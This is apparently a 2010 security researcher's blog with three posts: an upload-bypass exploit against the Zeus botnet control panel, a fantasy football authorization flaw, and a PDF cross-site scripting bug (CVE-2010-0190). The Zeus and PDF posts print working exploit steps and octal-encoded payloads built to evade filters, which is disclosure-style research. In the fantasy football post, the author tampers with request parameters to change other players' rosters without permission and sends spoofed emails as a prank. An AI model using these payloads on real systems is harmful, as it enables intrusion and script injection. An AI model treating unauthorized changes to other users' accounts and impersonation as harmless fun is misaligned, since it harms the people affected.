Sunday, September 26, 2010

Turning the Tables - Part I

Boom… I've just taken over a Zeus C&C.  I fire up a second, clean VM just to verify... yup it works.  Ok, now what?

A while back, I came across a kit for setting up a Zeus botnet.  It was an interesting package.  Looking at the C&C, bot builder, the actual bot, and user manual was pretty cool (yes, it comes with a user manual).  You have to admire the some of the tricks used by the bot, these guys are clever.  I set up a mini-botnet on a testing network and began to examine how the botnet worked.  Eventually, I came across some bugs (even a blind squirrel finds a nut every once in a while).  There are some fascinating things to consider when finding bugs in software that is used primarily by criminals, but I won’t bore you with that now.  Instead I’d like to share with you some of the more interesting parts of my research.

Before I proceed, there are a few things I’d like to state:

  1. This research was done on my own time on my own equipment.  The thoughts on my blog are my own.

  2. Disclosure of this issue is a bit tricky.  I’ll cover some of the issues I came across in a future post.

  3. I’m releasing the details of my work because I felt it was important for the public to have this knowledge to better defend their networks.

  4. All the work presented here is for academic and research purposes only.


In the spirit of responsible disclosure I contacted security@zeus.com and informed them that I may have discovered a security issue with their C&C server software.  The Zeus.com team informed me that they were a cloud service provider and didn’t have C&C software.  Zeus.com then proceeded to spam me with advertisements for their latest products.  I then contacted security@botnets-r-us.ru but received no response.  Botnets-r-us.ru then proceeded to spam me with Viagra ads and executables for me to download.  With no other alternative and an email inbox full of spam, I have no choice but to provide full disclosure of the vulnerability to the public.

Taking a look at the documentation that accompanies the Zeus package, I see change log indicates that I’m working with a recent version of Zeus (likely released earlier this year).



Examining the source code from the C&C confirms that I’m working with version 1.3.2.1, which was released on January 15th of this year.



I haven’t tested this exploit against newer versions of the C&C, but this post should provide everything you need to check yourself.  If you do happen to have a newer version of the C&C code (or kits from other botnets), please contact me (xssniper  -at- gmail) I’d love to have a look.  I looked on the Internetz to see if someone else had discovered this, but I found nothing.  If this bug was previously disclosed and I failed to credit you, please let me know (I don’t follow the bot scene very closely).

The C&C software has a PHP based web application that provides a control panel for botmasters and also serves as a gateway for bot communication.  There are several websites that have described the C&C so I won’t spend much time on that here, but I do feel it’s important to touch on a few things.  When the C&C web application is installed, very little attack surface is exposed to unauthenticated users.  The two most interesting pages available to unauthenticated users are the login page and the gateway.  By default, the login page is located at /cp.php.  By default, the gateway is located at /gate.php.  Some botmasters rename the gate.php file, however if you’ve managed to capture a live Zeus bot it will phone home to a php file.  The php file that the bot phones home to is the gateway (gate.php).  For clarity, let’s assume the gateway is at /gate.php (the default).  The gateway will only respond to requests from bots.  For example, if you point your browser to /gate.php, you’ll get a blank page back:



Luckily, we have both bot samples and the source for the C&C, allowing us to reverse the protocol needed for communication to the gateway.  Let’s walk through a couple key pieces of the gate.php source.  First, the gateway requires a POST request.
if(@$_SERVER['REQUEST_METHOD'] !== 'POST')die();

require_once('system/global.php');

require_once('system/config.php');

If the gateway receives a POST request, it grabs the POST body, performs some basic validation, and then decrypts the data using the RC4 algorithm.
$data      = @file_get_contents('php://input');

$data_size = @strlen($data);

if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();

$data = RC4($data, BOTNET_CRYPTKEY);

This is not a typical POST request with POST parameters in the body.  Instead, this POST request contains a binary blob as its POST body (there are no POST parameter names).  The last line in the code snippet provided above mentions RC4 and a PHP constant named BOTNET_CRYPTKEY.  In case you’re wondering, the RC4 key (BOTNET_CRYPTKEY) is set by the botmaster when setting up the C&C and is stored server side (in the /system/config.php file).  As RC4 is a symmetric algorithm, the bot must also have a representation of the key.  The key is embedded into the bot (supplied via configuration file).  So once you have captured a live bot, you’ll be able to extract the RC4 key.  The key can be extracted from memory or if you are able to decrypt the config.bin file, you’ll see the key passed as part of the configuration for the bot.  If you're interested in doing this, check out threatexpert.com.  Worst case, you can try brute forcing the key.

Once the data is decrypted, the gateway does a quick sanity check.
if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();

and proceeds to unpack the data if the sanity check turns out ok
$list = array();

for($i = HEADER_SIZE; $i < $data_size;)

{

$k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));

$list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);

$i += (ITEM_HEADER_SIZE + $k[3]);

}

unset($data);

Once the data is unpacked, we will have an array ($list[]) populated with various configuration and log data being passed from the bot to the C&C.  Using what we've discovered thus far, we can create a fake bot that is capable of communicating with the C&C.  Depending on the values held in the $list array, the gateway executes various functions.  One of the functions I found interesting was this:
else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))

{

$type = ToInt($list[SBCID_BOTLOG_TYPE]);

if($type == BLT_FILE)

{

//Расширения, которые представляют возможность удаленного запуска.

$bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');

$fd_hash  = 0;

$fd_size  = strlen($list[SBCID_BOTLOG]);

//Формируем имя файла.

if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

$file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);

$file_path = $file_root;

$last_name = '';

$l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));

foreach($l as &$k)

{

if(IsHackNameForPath($k))die();

$file_path .= '/'.($last_name = urlencode($k));

}

if(strlen($last_name) === 0)$file_path .= '/unknown.dat';

unset($l);

//Проверяем расширении, и указываем маску файла.

if(($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';

$ext_pos = strrpos($file_path, '.');

//FIXME: Если имя слишком большое.

if(strlen($file_path) > 180)$file_path = $file_root.'/longname.dat';

//Добавляем файл.

for($i = 0; $i < 9999; $i++)

{

if($i == 0)$f = $file_path;

else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1);

if(file_exists($f))

{

if($fd_size == filesize($f))

{

if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);

if(strcmp(md5_file($f, true), $fd_hash) === 0)break;

}

}

else

{

if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die();

flock($h, LOCK_EX);

fwrite($h, $list[SBCID_BOTLOG]);

flock($h, LOCK_UN);

fclose($h);

break;

}

}

}

A quick look at the function above shows that if $list[SBCID_BOTLOG] and $list[SBCID_BOTLOG_TYPE] are set to the correct values, we can trick the C&C into thinking we have a bot that needs to upload a logfile.  Before the C&C accepts our supplied logfile, it first attempts some validation by checking to see if the file extension we’re providing is in a blacklist of “bad extensions” and whether the filepath supplied is “IsHackNameForPath” (a custom validation routine written by the C&C author).
$bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');

…<snip>...

if(($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';

...<snip>

//Формируем имя файла.
if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

We know the web server supports PHP because the C&C web management console is written in PHP.  If we can pretend like we're a bot, convince the C&C that we have a "BOTLOG" that needs to be uploaded, and instead of uploading a "BOTLOG" we upload a PHP file with our PHP content, we could have arbitrary code execution on the C&C.  It seems the C&C code protects against this attack… or does it?  Unfortunately for the botmaster, the PHP interpreter is very liberal on extensions.  Some examples of the quirky extension madness associated with PHP can be found on slide 23 in this presentation (given by Kuza55 at CCC 2007).  In this case, I want to upload a PHP file to both IIS and Apache (the supported platforms for the C&C) so I use the trailing dot trick.  All I have to do is append a trailing period to the end of the .php extension (.php.), and I can bypass the extension check yet have the file contents run by the PHP interpreter.  Once the extension check is bypassed, the value I supplied for $list[SBCID_BOTLOG] is written as content to the file I specified on the webserver.  Now I just have to guess where my PHP file was written.  This line of PHP in the gateway source gives us a clue.
$file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);

The default location for the BOT LOG is: C&C-webroot\_reports\files\<Name of the botnet>\<Bot ID>\

I also control (via values passed from my fake bot to the C&C) the two subdirectory names (in this example: “BKs_BOTNET” for <Name of the botnet> and “BK_PWNZ_UR_CnC” for <Bot ID>).  If the botmaster is using a default install and hasn’t relocated the _reports folder, we should be able to simply guess where our PHP file was written to (/_reports/files/BKs_BOTNET/BK_PWNZ_UR_CnC/pwnd.php).



If the botmaster was smart and relocated the _reports folder, guessing where the uploaded PHP file becomes more difficult.  We can take all the guesswork out by using some directory traversal tricks and planting the PHP file directly into the webroot.

Boom… we've just taken over a Zeus C&C.  Once we have our own PHP code running on the C&C, we can include the /system/config.php file.  Config.php contains the location of the MySQL database as well as the DB username and password (via connection string), giving us complete control over the management console and all the bots associated with this C&C.

For those interested in “studying” this vulnerability, I’ve put together a Proof of Concept.  All you have to do is provide the location of the gateway (provided by the bot), the RC4 key (provided by the bot), and the PHP code that you want to upload.

Tuesday, September 21, 2010

Put me in Coach!

*** UPDATE ***
Rex Grossman is out for the season.  ESPN has fixed the issues I discussed below.  However, before you give up on your fantasy football season, apparently there is a stored XSS that I missed.  This guy will have details posted soon -->  http://lanmaster53.com/?p=182 .  The fun never stops :)
*** UPDATE ***

First, some background.  I love American football.  My team is the Chicago Bears.   I’ve been a Bears fan since the 80's when Walter Payton, Mike Singletary, and Jim McMahon dominated the field.  The last few years as a Bears fan has been difficult, but I’ve hung in there.  A few years ago the Bears had a quarterback named Rex Grossman.  To put it lightly, he wasn’t the greatest QB a team could have, in fact the Bears have traded him away.  I never really liked him.


Earlier this month, I was invited to play in a fantasy football league.  I’ve never played fantasy football, but I understood the rules and had many friends who played.  My friends (none of which work with computers for a living) needed one more player to round out a league of 10 teams so I decided to give it a shot.  Before the “season” begins, each player selects the football players they think will be the most successful during the season.  As my best player, I selected a running back named Ryan Grant who runs for the Green Bay Packers.  I was shocked to see my star player injured in the first game of the season with a season ending injury.  As I navigated the fantasy football website to find a replacement player, I came across several interesting issues.  There are some issues that allow me to cheat and win (dropping arbitrary players from another teams roster, modifying another teams starting lineup), but I want to win fair and square (I guess that Midshipman honor code has stuck with me)… but as a notorious prankster I figured I could have a little fun with the bugs I discovered.

When a team decides to add a new player to their roster the player navigates through several menus and selection screens.  The final confirmation URL for adding a player to the bench looks something like this:
leagueId=111111&incoming=1&trans=2_4480_-1_1002_3_20

The leagueId represents the “league” in which our teams are playing.  The trans parameter represents the actual transaction.  Looking at the trans parameter, I’ve broken the various pieces into the following:
2 <-- this is the type of transaction to be executed

4480 <-- This is the unique player ID for Rex Grossman

-1 <-- some sort of increment value/ counter?

1002 <-- another value that describes the transaction

3 <-- team id for my team

20 <-- not sure what this number is

Unfortunately for the other players in my league, the fantasy football application does a poor job of authorization checking.  These poor checks allow me to manipulate the trans parameter to add an arbitrary player to any teams roster.   I decided to add Rex Grossman to one of my rivals bench (not the starting lineup).



Soon after adding Rex to my rival’s bench, I spoofed an email from Rex Grossman with a plea to play.


A few days later, my rival was posting to the entire league that Rex Grossman had magically added himself to his roster and had emailed him to play.  My rival then dropped him from the roster before the next weeks play.



Unfortunately for my rival, Rex is a persistent player.  This week I traded him from waivers for another player on my rivals team.  Trading from waivers/free agency is a bit more complicated and the query string is a bit more complicated, but the overall gist is the same (I also had to fake the waiver transaction ID).
trans=3_2753_1_20_-1_1002|2_4480_-1_1002_1_20

The numbers before the “|” character belong to the player who is to be dropped from the roster (the bench) to waivers while the numbers after the pipe character represent the player to be added to the roster (to the bench, not the starting lineup).  In this example, I’ve dropped T.J. Houshmandzadeh off of my rival’s bench roster and added Rex Grossman back to the bench.


Of course, another spoofed email goes out to explain the situation.



We’ll see what next week brings.  I’ve contacted the fantasy football game provider (probably the largest provider in the US), hopefully they’ll fix it soon…

Monday, September 6, 2010

PDF XSS (CVE-2010-0190)

In April of this year, Adobe patched a couple of bugs I reported to them.  One was a code execution bug (CVE-2010-0191) and the other was a PDF based XSS (CVE-2010-0190).  I’ll cover the code execution bug in a future post (as Adobe is still fixing a variant I reported), but for now I’d like to touch on the PDF XSS.

PDF based XSS isn’t a new concept, even Adobe considers PDFs to be active content.  With that said, I’m surprised at the number of web applications that allow users to upload PDFs and then serve those PDF’s inline as opposed to an attachment (although there are some gotchas with content-disposition attachment).  Serving a user supplied PDF inline essentially allows that user to execute arbitrary client side code from the domain serving the PDF.  The safer way to handle PDFs is to serve them with the content-disposition set to attachment.  An even better method is to serve the user controlled content from a separate domain.  This can be difficult for web content portals that are deployed internally like SharePoint, Outlook Web Access (OWA) and Oracle Web (all of which were affected by this bug) where the organization would have to write custom code and employ custom configurations to protect themselves from PDF based XSS exposures.  Serving PDFs with a content disposition set to attachment also creates usability issues as an ugly download warning will appear instead of the more friendly PDF content in the browser window behavior.

Although this particular bug was patched by Adobe a few months ago, there were a few things I learned that could possibly be used in other PDF bugs.  I'd like to share some of the more interesting items.

PDFs Support Octal Encoding


PDFs support  JavaScript from within the PDF.  Unfortunately, the script executed from within the PDF will not have access to the browsers DOM.  In order to gain access to the browser’s DOM, we have to use the PDF to redirect the browser to a JavaScript URI.  Normally, redirection to JavaScript URIs are blocked by the PDF security routines, however I discovered an easy bypass using octal encoding.  I place the JavaScript payload into an OpenAction for the PDF, using an octal encoded value (\72) for the “:” character.  An example of the OpenAction is presented below:
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/OpenAction <<
/S /URI
/IsMap false
/URI (javascript\72alert("FTW - "+document.domain))
>>

A super simple XSS with PDFs.  When the PDF is opened in the browser, it redirects the browser to a JavaScript URL allowing for XSS.  Mailing out a rigged PDF as an attachment to some friends using OWA would have been an interesting exercise as certain versions of OWA open PDF attachments inline.  Although I encoded the “:” character in the example above, any character in passed to the OpenAction can be encoded and Adobe Reader will handle it.  In fact, octal encoding can be used throughout the PDF in various scripts and actions.  For example, you could encode the entire protocol handler and it would still work:
/URI (\112\101\126\101\123\103\122\111\120\124\72alert(document.domain))

You can even mix and match the encoding, making it extremely difficult for any signature based IDS to detect malicious payloads.
/URI (j\101v\101s\103r\111p\124\72alert(document.domain))

If you’re up against a security blacklist when attempting to exploit a PDF bug, try passing an octal encoded value for your payload.  This was the bug Adobe fixed with CVE-2010-0190

Security models are different for local and remote PDFs


Like most browser plug-ins Adobe has implemented different security mechanisms for PDFs opened from the local file system and PDFs opened remotely.  It can be useful to determine whether the PDF was opened remotely or locally.  The following script returns an indication as to how the PDF was loaded.
//In the browser or loaded locally
if ( this.external )
{
// Viewing from a browser
}
else
{
// Viewing in the Acrobat application.
}

This can be useful if your exploit only works for locally loaded PDFs or maybe if your exploit only works for remotely loaded PDFs.

PDFs can be used to call the default browser


There can be situations where the user browses certain websites with one browser, but uses another browser as their default browser.  Adobe Acrobat Reader actually provides an API (I’m not sure if it’s intentional) to pass a URI to the default browser.
app.launchURL("http://xs-sniper.com/",true);

If a user calls app.launchURL and passes the “true” flag, the default browser is opened and handles the passed URI.  This can provide a bridge between two different browsers and can increase the reachable attack surface in some circumstances.  If the user is using the default browser to open the PDF, this can help bypass pop-up blockers.  You can test this by setting your default browser to IE and browsing the following PDF in FireFox.  PDF HERE

There was an excellent presentation at PacSec that covered a ton of PDF bugs and Didier Stevens always has interesting PDF stuff.  I hope this helps someone out there!  Happy hunting.